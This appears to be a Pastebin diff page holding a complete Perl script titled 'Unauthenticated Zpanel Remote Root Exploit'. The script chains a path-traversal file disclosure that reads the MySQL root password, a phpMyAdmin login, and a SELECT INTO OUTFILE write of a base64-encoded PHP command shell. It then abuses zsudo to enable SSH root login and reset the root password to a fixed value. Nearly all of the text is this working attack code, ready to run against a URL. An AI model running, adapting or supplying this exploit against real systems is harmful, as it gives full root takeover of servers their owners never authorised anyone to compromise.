API tools faq
paste
View difference between Paste ID: vYGtKqUq and y5Pf4Yms
SHOW: | | - or go back to the newest paste.
1
#!/usr/bin/perl
2
#********************************************************************************
3
#
4
#
5
#                Unauthenticated Zpanel Remote Root Exploit
6
#                            japp@0xlabs.com
7
#                         http://www.0xlabs.com
8
#
9
#
10
#********************************************************************************
11
12
13
use LWP::UserAgent;

14
15
$FILE_DISCLOSURE = "etc/lib/pChart2/examples/index.php?Action=View&Script=../../../../cnf/db.php";

16
$PMA_PATH        = "etc/apps/phpmyadmin/index.php";

17
$PMA_DOCROOT     = "etc/apps/phpmyadmin/import.php";

18
19
print "\n\n";

20
print "\t================================\n";

21
print "\t[  Zpanel Remote Root Exploit  ]\n";

22
print "\t[     By japp\@0xlabs.com       ]\n";

23
print "\t[       www.0xlabs.com         ]\n";

24
print "\t================================\n\n";

25
26
27
my $argc = @ARGV;

28
29
if ( $argc != 1 )

30
{

31
        print " [*] Usage: ".$0." <http://localhost/zpanel/>\n";

32
        exit 1;

33
}

34
35
my $ua = http_handler();

36
my $url = $ARGV[0];

37
38
if ( $url !~ /^http/ ){ $url = "http://".$url; }

39
if ( $url !~ /\/$/ )  { $url .= "/"; }

40
41
print " [*] Trying to get MySQL root password...\n";

42
my $root_pass = GetPasswd ($url, $ua);

43
print " [+] Mysql root password: ".$root_pass."\n";

44
45
print " [*] Trying to access through phpMyAdmin...\n";

46
my $token = AccessPma ($root_pass, $url, $ua);

47
print " [+] Login successfully\n";

48
49
print " [*] Getting Zpanel document root...\n";

50
my $docroot = GetDocRoot ($token, $url, $ua);

51
print " [+] Zpanel document root: ".$docroot."\n";

52
53
print " [*] Uploading shell...\n";

54
UploadShell ($token, $docroot, $url, $ua);

55
print " [+] Shell uploaded successfully!\n";

56
57
print " [+] Enabling SSH root login\n";

58
EnableRoot ($url, $ua);

59
60
print " [*] Changing root password...\n";

61
ChangePasswd ($url, $ua);

62
63
print " [+] Root password changed\n\n";

64
print " [!] Now you can login through SSH. Root password is '0xlabs'\n\n";

65
66
sub ChangePasswd

67
{

68
        my $url     = $_[0];

69
        my $ua      = $_[1];

70
71
        my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"root:0xlabs\'\" \"|/usr/sbin/chpasswd;%23\"");

72
}

73
74
sub EnableRoot

75
{

76
        my $url     = $_[0];

77
        my $ua      = $_[1];

78
79
        my $rsp = $ua->get ($url."0xlabs.php?c=cd bin;./zsudo \"\';sed -i \'s-PermitRootLogin no-PermitRootLogin yes-g\'\" \"/etc/ssh/*hd_config %23\"");

80
81
}

82
83
sub UploadShell

84
{

85
        my $token   = $_[0];

86
        my $docroot = $_[1];

87
        my $url     = $_[2];

88
        my $ua      = $_[3];

89
90
        my %pdata;

91
92
        $pdata{"token"}         = $token;

93
        $pdata{"sql_query"}     = "SELECT '<?php eval(base64_decode(\"cGFzc3RocnUoJF9HRVRbImMiXSk7\"));?>' INTO OUTFILE '".$docroot."0xlabs.php'";

94
        $pdata{"ajax_request"}  = "true";

95
96
        http_post ($url.$PMA_DOCROOT, $ua, %pdata);

97
98
        my $rsp = $ua->get ($url."0xlabs.php?c=echo 0xlabs_rulz");

99
100
        if (!$rsp->is_success)

101
        {

102
                die (" [-] Can't locate uploaded shell at '".$url."0xlabs.php'\n");

103
        }

104
        my $cont = $rsp->content;

105
106
        if ( $cont !~ /0xlabs_rulz/ )

107
        {

108
                die (" [-] Can't validate uploaded shell. Check manually: ".$url."0xlabs.php?c=dir\n");

109
        }

110
}

111
112
sub GetDocRoot

113
{

114
        my $token   = $_[0];

115
        my $url     = $_[1];

116
        my $ua      = $_[2];

117
118
        my %pdata;

119
120
        $pdata{"token"}         = $token;

121
        $pdata{"sql_query"}     = "SELECT so_value_tx FROM zpanel_core.x_settings WHERE so_name_vc='zpanel_root'";

122
        $pdata{"ajax_request"}  = "true";

123
124
        my $cont = http_post ($url.$PMA_DOCROOT, $ua, %pdata);

125
126
        $cont =~ /class=\"data grid_edit\s*">([^<]+)<\/td>/;

127
128
        return $1;

129
}

130
131
sub AccessPma

132
{

133
        my $root_pass   = $_[0];

134
        my $url         = $_[1];

135
        my $ua          = $_[2];

136
137
        my %pdata;

138
139
        my $rsp = $ua->get ($url.$PMA_PATH);

140
141
        if (!$rsp->is_success) {

142
                die (" [-] Can't access to phpMyAdmin at '".$url.$PMA_PATH."'\n");

143
        }

144
145
        my $cont = $rsp->content;

146
147
        $cont =~ /name=\"token\" value=\"(.+)\"/;

148
149
        my $token = $1;

150
151
        $pdata{"pma_username"}          = "root";

152
        $pdata{"pma_password"}          = $root_pass;

153
        $pdata{"server"}                = "1";

154
        $pdata{"lang"}                  = "en";

155
        $pdata{"collation_connection"}  = "utf8_general_ci";

156
        $pdata{"token"}                 = $token;

157
158
        $cont = http_post ($url.$PMA_PATH, $ua, %pdata);

159
160
        if ( $cont =~ /Cannot log in to the MySQL server/ )

161
        {

162
                die (" [-] Cannot log in to phpMyAdmin\n");

163
        }

164
165
        $cont =~ /\?token=(.+)\"/;

166
167
        return $1;

168
}

169
170
171
172
sub GetPasswd

173
{

174
        my $url = $_[0];

175
        my $ua  = $_[1];

176
177
178
        my $rsp = $ua->get ($url.$FILE_DISCLOSURE);

179
180
        if (!$rsp->is_success) {

181
                die (" [-] Can't get '".$url."'. Check URL.\n");

182
        }

183
184
        my $cont = $rsp->content;

185
186
        if ( $cont !~ /root/ )

187
        {

188
                die (" [-] Can't get root password. Patched?\n");

189
        }

190
191
        my $flag = 0;

192
        while ( $cont =~ /#DD0000\">[\'\"]+([^\"^\']+)[\'\"]+/g )

193
        {

194
                $flag++;

195
                if ( $flag == 4 )

196
                {

197
                        return $1;

198
                }

199
        }

200
201
 }

202
203
sub http_post

204
{

205
                my ($host, $ua, %data)  = @_;

206
207
                my $rsp                 = $ua->post ($host, [%data]);

208
209
                return ($rsp->content);

210
}

211
212
sub http_handler

213
{

214
                my $newhandler          = LWP::UserAgent->new() or return -1;

215
216
                $newhandler->agent ("Mozilla/5.0 (Windows; U; Windows NT 5.2; rv:1.9.2) Gecko/20100101 Firefox/3.6");

217
                $newhandler->timeout(10);

218
                $newhandler->protocols_allowed(['http','https']);

219
                $newhandler->cookie_jar( {} );

220
221
                push @{ $newhandler->requests_redirectable }, 'GET';

222
                push @{ $newhandler->requests_redirectable }, 'POST';

223
224
                return $newhandler;

225
}
        

    


            


                                


        

            



                
    

        Public Pastes
    

    
            

    

                    

        

    





    


    
    
    
    
    
    
    
    




    


    



                

            We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.             OK, I Understand
        

    
                

            

                
                    
                
            

            

                Not a member of Pastebin yet?

                Sign Up, it unlocks many cool features!